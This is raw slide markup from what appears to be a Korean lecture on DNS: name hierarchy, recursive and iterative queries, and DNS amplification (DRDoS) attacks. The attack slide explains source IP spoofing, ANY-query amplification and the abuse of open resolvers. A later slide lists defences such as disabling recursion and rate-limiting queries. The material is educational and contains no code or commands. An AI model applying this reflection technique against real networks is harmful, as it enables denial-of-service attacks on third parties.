        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7807068" y="4283098"/>
            <a:ext cx="3505689" cy="1486107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64626EF-629B-4315-A333-5D73F4F5690A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715615" y="2917098"/>
            <a:ext cx="1688592" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AES.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25746967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TCP/IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>프로토콜</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Slowloris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93995"/>
            <a:ext cx="76200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80214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descr="컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD8057E-801F-454D-A530-487AB48CD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920" y="1690688"/>
            <a:ext cx="4955337" cy="48260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컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAD7A59-7C0F-45EF-A52D-0320F360C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492" y="1603603"/>
            <a:ext cx="2133600" cy="45815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32" name="직선 화살표 연결선 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D7BF03-1954-41FB-BC68-333CB91F4D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3494314" y="5641521"/>
            <a:ext cx="4661807" cy="318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360F30F-233E-4C66-A2E9-1DC5DAF274B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665277" y="5431393"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E78D56-A556-40ED-94A9-8E6AF5628F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="2400737"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=TLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2956B1B1-97A5-4074-8369-8F55114373D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="3342939"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=SLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B9C85E-2B90-4EEF-9394-E6A07A429C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646227" y="4403449"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367353818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32" name="Picture 12" descr="반복적 질의 2단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD7032C-1F53-41D9-8AE1-9E4411349A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077" y="2000251"/>
            <a:ext cx="7597443" cy="363923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화살표 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041FED53-C3A7-4ACA-B94B-70E1138E1585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837714" y="3780064"/>
            <a:ext cx="816429" cy="3265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93315E3D-1D4F-4C71-93C2-A47D7EFD3D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519307" y="3665764"/>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3660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DNS - 여러분이 google.com을 칠 때 - 웹 부트캠퍼를 위한 컴퓨터 과학">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAADBC9-C6B3-446A-A5DD-BD7860268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0250"/>
            <a:ext cx="7597443"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313132D2-2E2B-417B-AFD8-B676EE519230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7862207" y="4212771"/>
            <a:ext cx="767443" cy="11593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FD9A8404-3F1E-449B-8198-C73D4CF6F2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="4098471"/>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972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반복적 질의 4단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F58ABF-06D0-48AA-AD87-E74396685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8413"/>
            <a:ext cx="7567294"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755D36D2-9494-4109-B0F8-75A9BCB82EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836571" y="5760534"/>
            <a:ext cx="8238158"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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버는 재귀적 질의와 반복적 질의 두가지의 시스템이 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재귀적 질의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시스템 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983877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6" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8264202-C8A2-4E1E-BEB8-2ABF183551AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1814235" y="1764674"/>
            <a:ext cx="7688993" cy="3328652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CF69EE-3687-4A7C-859E-B4395462B98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="5033283"/>
            <a:ext cx="7677150" cy="1085850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCABF6F-B4BF-45D9-948C-4B9E6B2D720E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="6048623"/>
            <a:ext cx="7458075" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165392840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106A686F-8AAA-433A-910E-08D55BE48F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="2017350"/>
            <a:ext cx="4791075" cy="3362325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692509E1-0514-4519-93EE-036E3E468D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5861277" y="2036400"/>
            <a:ext cx="5400675" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68699342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204357"/>
            <a:ext cx="5821587" cy="41937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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 이용한 트래픽 증폭 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>출발지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변조를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통해 공격지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>response data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 트래픽을 향하게 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>질의에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인증 절차가 없기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>때문에 변조가 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>마치 거울에 반사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>하듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DRDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 과정에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입의 쿼리를 이용하여 트래픽이 증폭 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격자 입장에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Open DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 모두 좀비 피씨인 셈으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>효율적인 공격이 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256203139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029898"/>
            <a:ext cx="5821587" cy="46092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dirty="0"/>
              <a:t>방어방법은 다양하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버에서 재귀를 할 수 없도록 설정한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인 정보가 없는 질의에 대해 응답을 못 할 수도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>resolve.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일에 외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리를 못하게 설정한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 변조 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(syn-cookie mechanism) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보안장비를 배치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방화벽 설정을 통해 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>응답을 차단한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>매 초마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리의 제한을 둔다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
